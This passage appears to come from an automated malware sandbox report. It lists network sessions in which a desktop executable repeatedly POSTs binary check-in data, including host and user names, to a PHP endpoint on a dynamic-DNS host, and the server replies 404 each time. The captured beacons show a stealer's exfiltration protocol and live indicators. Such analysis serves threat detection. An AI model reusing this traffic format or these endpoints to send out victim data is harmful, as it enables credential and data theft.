                                                        Oct 3, 2024 09:20:48.138102055 CEST176OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                        Data Ascii: 'ckav.rutotti210979TOTTI-PCk0FDD42EE188E931437F4FBE2CUzlbc
                                                        Oct 3, 2024 09:20:49.077418089 CEST169INHTTP/1.1 404 Not Found
                                                        Server: nginx/1.10.3
                                                        Date: Thu, 03 Oct 2024 07:20:48 GMT
                                                        Content-Type: text/html
                                                        Connection: close
                                                        X-Powered-By: PHP/5.3.3
                                                        Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                        Data Ascii: File not found.


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        1192.168.2.114971245.149.241.169801392C:\Users\user\Desktop\mjtjewi.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 3, 2024 09:20:49.388974905 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                        Host: freighteighttwocam.ddns.net
                                                        Accept: */*
                                                        Content-Type: application/octet-stream
                                                        Content-Encoding: binary
                                                        Content-Key: 5EE1FC9E
                                                        Content-Length: 176
                                                        Connection: close
                                                        Oct 3, 2024 09:20:49.427131891 CEST176OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                        Data Ascii: 'ckav.rutotti210979TOTTI-PC+0FDD42EE188E931437F4FBE2CTjeqH
                                                        Oct 3, 2024 09:20:50.285749912 CEST169INHTTP/1.1 404 Not Found
                                                        Server: nginx/1.10.3
                                                        Date: Thu, 03 Oct 2024 07:20:49 GMT
                                                        Content-Type: text/html
                                                        Connection: close
                                                        X-Powered-By: PHP/5.3.3
                                                        Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                        Data Ascii: File not found.


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        2192.168.2.114971345.149.241.169801392C:\Users\user\Desktop\mjtjewi.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 3, 2024 09:20:50.390712023 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                        Host: freighteighttwocam.ddns.net
                                                        Accept: */*
                                                        Content-Type: application/octet-stream
                                                        Content-Encoding: binary
                                                        Content-Key: 5EE1FC9E
                                                        Content-Length: 149
                                                        Connection: close
                                                        Oct 3, 2024 09:20:50.395967960 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                        Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
                                                        Oct 3, 2024 09:20:51.444361925 CEST177INHTTP/1.1 404 Not Found
                                                        Server: nginx/1.10.3
                                                        Date: Thu, 03 Oct 2024 07:20:50 GMT
                                                        Content-Type: text/html
                                                        Connection: close
                                                        X-Powered-By: PHP/5.3.3
                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                        Data Ascii: File not found.
                                                        Oct 3, 2024 09:20:51.445071936 CEST177INHTTP/1.1 404 Not Found
                                                        Server: nginx/1.10.3
                                                        Date: Thu, 03 Oct 2024 07:20:50 GMT
                                                        Content-Type: text/html
                                                        Connection: close
                                                        X-Powered-By: PHP/5.3.3
                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                        Data Ascii: File not found.


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        3192.168.2.114971445.149.241.169801392C:\Users\user\Desktop\mjtjewi.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 3, 2024 09:20:52.127427101 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                        Host: freighteighttwocam.ddns.net
                                                        Accept: */*
                                                        Content-Type: application/octet-stream
                                                        Content-Encoding: binary
                                                        Content-Key: 5EE1FC9E
                                                        Content-Length: 149
                                                        Connection: close
                                                        Oct 3, 2024 09:20:52.138115883 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                        Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
                                                        Oct 3, 2024 09:20:52.895509005 CEST177INHTTP/1.1 404 Not Found
                                                        Server: nginx/1.10.3
                                                        Date: Thu, 03 Oct 2024 07:20:52 GMT
                                                        Content-Type: text/html
                                                        Connection: close
                                                        X-Powered-By: PHP/5.3.3
                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                        Data Ascii: File not found.


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        4192.168.2.114971545.149.241.169801392C:\Users\user\Desktop\mjtjewi.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 3, 2024 09:20:53.054243088 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                        Host: freighteighttwocam.ddns.net
                                                        Accept: */*
                                                        Content-Type: application/octet-stream
                                                        Content-Encoding: binary
                                                        Content-Key: 5EE1FC9E
                                                        Content-Length: 149
                                                        Connection: close
                                                        Oct 3, 2024 09:20:53.059613943 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                        Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
                                                        Oct 3, 2024 09:20:55.154339075 CEST177INHTTP/1.1 404 Not Found
                                                        Server: nginx/1.10.3
                                                        Date: Thu, 03 Oct 2024 07:20:54 GMT
                                                        Content-Type: text/html
                                                        Connection: close
                                                        X-Powered-By: PHP/5.3.3
                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                        Data Ascii: File not found.


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        5192.168.2.114971745.149.241.169801392C:\Users\user\Desktop\mjtjewi.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 3, 2024 09:20:55.306317091 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                        Host: freighteighttwocam.ddns.net
                                                        Accept: */*
                                                        Content-Type: application/octet-stream
                                                        Content-Encoding: binary
                                                        Content-Key: 5EE1FC9E
                                                        Content-Length: 149
                                                        Connection: close
                                                        Oct 3, 2024 09:20:55.313220024 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                        Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
                                                        Oct 3, 2024 09:20:56.378058910 CEST177INHTTP/1.1 404 Not Found
                                                        Server: nginx/1.10.3
                                                        Date: Thu, 03 Oct 2024 07:20:55 GMT
                                                        Content-Type: text/html
                                                        Connection: close
                                                        X-Powered-By: PHP/5.3.3
                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                        Data Ascii: File not found.


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        6192.168.2.114971845.149.241.169801392C:\Users\user\Desktop\mjtjewi.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 3, 2024 09:20:56.539355040 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                        Host: freighteighttwocam.ddns.net
                                                        Accept: */*
                                                        Content-Type: application/octet-stream
                                                        Content-Encoding: binary
                                                        Content-Key: 5EE1FC9E
                                                        Content-Length: 149
                                                        Connection: close
                                                        Oct 3, 2024 09:20:56.544536114 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                        Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
                                                        Oct 3, 2024 09:20:57.546360970 CEST177INHTTP/1.1 404 Not Found
                                                        Server: nginx/1.10.3
                                                        Date: Thu, 03 Oct 2024 07:20:56 GMT
                                                        Content-Type: text/html
                                                        Connection: close
                                                        X-Powered-By: PHP/5.3.3
                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                        Data Ascii: File not found.


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        7192.168.2.115584345.149.241.169801392C:\Users\user\Desktop\mjtjewi.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 3, 2024 09:20:58.060252905 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                        Host: freighteighttwocam.ddns.net
                                                        Accept: */*
                                                        Content-Type: application/octet-stream
                                                        Content-Encoding: binary
                                                        Content-Key: 5EE1FC9E
                                                        Content-Length: 149
                                                        Connection: close
                                                        Oct 3, 2024 09:20:58.316168070 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                        Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
                                                        Oct 3, 2024 09:20:59.117296934 CEST177INHTTP/1.1 404 Not Found
                                                        Server: nginx/1.10.3
                                                        Date: Thu, 03 Oct 2024 07:20:58 GMT
                                                        Content-Type: text/html
                                                        Connection: close
                                                        X-Powered-By: PHP/5.3.3
                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                        Data Ascii: File not found.


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        8192.168.2.116434845.149.241.169801392C:\Users\user\Desktop\mjtjewi.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 3, 2024 09:20:59.267592907 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                        Host: freighteighttwocam.ddns.net
                                                        Accept: */*
                                                        Content-Type: application/octet-stream
                                                        Content-Encoding: binary
                                                        Content-Key: 5EE1FC9E
                                                        Content-Length: 149
                                                        Connection: close
                                                        Oct 3, 2024 09:20:59.272737026 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                        Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
                                                        Oct 3, 2024 09:21:00.351605892 CEST177INHTTP/1.1 404 Not Found
                                                        Server: nginx/1.10.3
                                                        Date: Thu, 03 Oct 2024 07:20:59 GMT
                                                        Content-Type: text/html
                                                        Connection: close
                                                        X-Powered-By: PHP/5.3.3
                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                        Data Ascii: File not found.


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        9192.168.2.116435045.149.241.169801392C:\Users\user\Desktop\mjtjewi.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 3, 2024 09:21:00.665224075 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                        Host: freighteighttwocam.ddns.net
                                                        Accept: */*
                                                        Content-Type: application/octet-stream
                                                        Content-Encoding: binary
                                                        Content-Key: 5EE1FC9E
                                                        Content-Length: 149
                                                        Connection: close
                                                        Oct 3, 2024 09:21:00.670902967 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                        Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
                                                        Oct 3, 2024 09:21:01.453564882 CEST177INHTTP/1.1 404 Not Found
                                                        Server: nginx/1.10.3
                                                        Date: Thu, 03 Oct 2024 07:21:00 GMT
                                                        Content-Type: text/html
                                                        Connection: close
                                                        X-Powered-By: PHP/5.3.3
                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                        Data Ascii: File not found.


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        10192.168.2.116435245.149.241.169801392C:\Users\user\Desktop\mjtjewi.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 3, 2024 09:21:01.618191004 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                        Host: freighteighttwocam.ddns.net
                                                        Accept: */*
                                                        Content-Type: application/octet-stream
                                                        Content-Encoding: binary
                                                        Content-Key: 5EE1FC9E
                                                        Content-Length: 149
                                                        Connection: close
                                                        Oct 3, 2024 09:21:01.623466969 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                        Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
                                                        Oct 3, 2024 09:21:02.292433023 CEST177INHTTP/1.1 404 Not Found
                                                        Server: nginx/1.10.3
                                                        Date: Thu, 03 Oct 2024 07:21:01 GMT
                                                        Content-Type: text/html
                                                        Connection: close
                                                        X-Powered-By: PHP/5.3.3
                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                        Data Ascii: File not found.


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        11192.168.2.116435445.149.241.169801392C:\Users\user\Desktop\mjtjewi.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 3, 2024 09:21:02.443226099 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                        Host: freighteighttwocam.ddns.net
                                                        Accept: */*
                                                        Content-Type: application/octet-stream
                                                        Content-Encoding: binary
                                                        Content-Key: 5EE1FC9E
                                                        Content-Length: 149
                                                        Connection: close
                                                        Oct 3, 2024 09:21:02.448704004 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                        Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
                                                        Oct 3, 2024 09:21:03.191437006 CEST177INHTTP/1.1 404 Not Found
                                                        Server: nginx/1.10.3
                                                        Date: Thu, 03 Oct 2024 07:21:02 GMT
                                                        Content-Type: text/html
                                                        Connection: close
                                                        X-Powered-By: PHP/5.3.3
                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                        Data Ascii: File not found.


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        12192.168.2.116435545.149.241.169801392C:\Users\user\Desktop\mjtjewi.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 3, 2024 09:21:03.482903957 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                        Host: freighteighttwocam.ddns.net
                                                        Accept: */*
                                                        Content-Type: application/octet-stream
                                                        Content-Encoding: binary
                                                        Content-Key: 5EE1FC9E
                                                        Content-Length: 149
                                                        Connection: close
                                                        Oct 3, 2024 09:21:03.488048077 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                        Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
                                                        Oct 3, 2024 09:21:04.262743950 CEST177INHTTP/1.1 404 Not Found
                                                        Server: nginx/1.10.3
                                                        Date: Thu, 03 Oct 2024 07:21:03 GMT
                                                        Content-Type: text/html
                                                        Connection: close
                                                        X-Powered-By: PHP/5.3.3
                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                        Data Ascii: File not found.


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        13192.168.2.116435745.149.241.169801392C:\Users\user\Desktop\mjtjewi.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 3, 2024 09:21:04.423429966 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                        Host: freighteighttwocam.ddns.net
                                                        Accept: */*
                                                        Content-Type: application/octet-stream
                                                        Content-Encoding: binary
                                                        Content-Key: 5EE1FC9E
                                                        Content-Length: 149
                                                        Connection: close
                                                        Oct 3, 2024 09:21:04.428361893 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                        Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
                                                        Oct 3, 2024 09:21:05.200607061 CEST177INHTTP/1.1 404 Not Found
                                                        Server: nginx/1.10.3
                                                        Date: Thu, 03 Oct 2024 07:21:04 GMT
                                                        Content-Type: text/html
                                                        Connection: close
                                                        X-Powered-By: PHP/5.3.3
                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                        Data Ascii: File not found.


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        14192.168.2.116435845.149.241.169801392C:\Users\user\Desktop\mjtjewi.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 3, 2024 09:21:05.354207039 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                        Host: freighteighttwocam.ddns.net
                                                        Accept: */*
                                                        Content-Type: application/octet-stream
                                                        Content-Encoding: binary
                                                        Content-Key: 5EE1FC9E
                                                        Content-Length: 149
                                                        Connection: close
                                                        Oct 3, 2024 09:21:05.363792896 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                        Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
                                                        Oct 3, 2024 09:21:06.209109068 CEST177INHTTP/1.1 404 Not Found
                                                        Server: nginx/1.10.3
                                                        Date: Thu, 03 Oct 2024 07:21:05 GMT
                                                        Content-Type: text/html
                                                        Connection: close
                                                        X-Powered-By: PHP/5.3.3
                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                        Data Ascii: File not found.


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        15192.168.2.116435945.149.241.169801392C:\Users\user\Desktop\mjtjewi.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 3, 2024 09:21:06.380893946 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                        Host: freighteighttwocam.ddns.net
                                                        Accept: */*
                                                        Content-Type: application/octet-stream
                                                        Content-Encoding: binary
                                                        Content-Key: 5EE1FC9E
                                                        Content-Length: 149
                                                        Connection: close
                                                        Oct 3, 2024 09:21:06.386274099 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                        Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
                                                        Oct 3, 2024 09:21:07.095535040 CEST177INHTTP/1.1 404 Not Found
                                                        Server: nginx/1.10.3
                                                        Date: Thu, 03 Oct 2024 07:21:06 GMT
                                                        Content-Type: text/html
                                                        Connection: close
                                                        X-Powered-By: PHP/5.3.3
                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                        Data Ascii: File not found.


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        16192.168.2.116436045.149.241.169801392C:\Users\user\Desktop\mjtjewi.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 3, 2024 09:21:07.258128881 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                        Host: freighteighttwocam.ddns.net
                                                        Accept: */*
                                                        Content-Type: application/octet-stream
                                                        Content-Encoding: binary
                                                        Content-Key: 5EE1FC9E
                                                        Content-Length: 149
                                                        Connection: close
                                                        Oct 3, 2024 09:21:07.265208006 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                        Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
                                                        Oct 3, 2024 09:21:08.057806969 CEST177INHTTP/1.1 404 Not Found
                                                        Server: nginx/1.10.3
                                                        Date: Thu, 03 Oct 2024 07:21:07 GMT
                                                        Content-Type: text/html
                                                        Connection: close
                                                        X-Powered-By: PHP/5.3.3
                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                        Data Ascii: File not found.


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        17192.168.2.116436145.149.241.169801392C:\Users\user\Desktop\mjtjewi.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 3, 2024 09:21:08.219978094 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                        Host: freighteighttwocam.ddns.net
                                                        Accept: */*
                                                        Content-Type: application/octet-stream
                                                        Content-Encoding: binary
                                                        Content-Key: 5EE1FC9E
                                                        Content-Length: 149
                                                        Connection: close
                                                        Oct 3, 2024 09:21:08.224948883 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                        Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
                                                        Oct 3, 2024 09:21:08.908827066 CEST177INHTTP/1.1 404 Not Found
                                                        Server: nginx/1.10.3
                                                        Date: Thu, 03 Oct 2024 07:21:08 GMT
                                                        Content-Type: text/html
                                                        Connection: close
                                                        X-Powered-By: PHP/5.3.3
                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                        Data Ascii: File not found.


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        18192.168.2.116436245.149.241.169801392C:\Users\user\Desktop\mjtjewi.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 3, 2024 09:21:09.167659998 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                        Host: freighteighttwocam.ddns.net
                                                        Accept: */*
                                                        Content-Type: application/octet-stream
                                                        Content-Encoding: binary
                                                        Content-Key: 5EE1FC9E
                                                        Content-Length: 149
                                                        Connection: close
                                                        Oct 3, 2024 09:21:09.172629118 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                        Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
                                                        Oct 3, 2024 09:21:09.839379072 CEST177INHTTP/1.1 404 Not Found
                                                        Server: nginx/1.10.3
                                                        Date: Thu, 03 Oct 2024 07:21:09 GMT
                                                        Content-Type: text/html
                                                        Connection: close
                                                        X-Powered-By: PHP/5.3.3
                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                        Data Ascii: File not found.


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        19192.168.2.116436345.149.241.169801392C:\Users\user\Desktop\mjtjewi.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 3, 2024 09:21:09.991626978 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                        Host: freighteighttwocam.ddns.net
                                                        Accept: */*
                                                        Content-Type: application/octet-stream
                                                        Content-Encoding: binary
                                                        Content-Key: 5EE1FC9E
                                                        Content-Length: 149
                                                        Connection: close
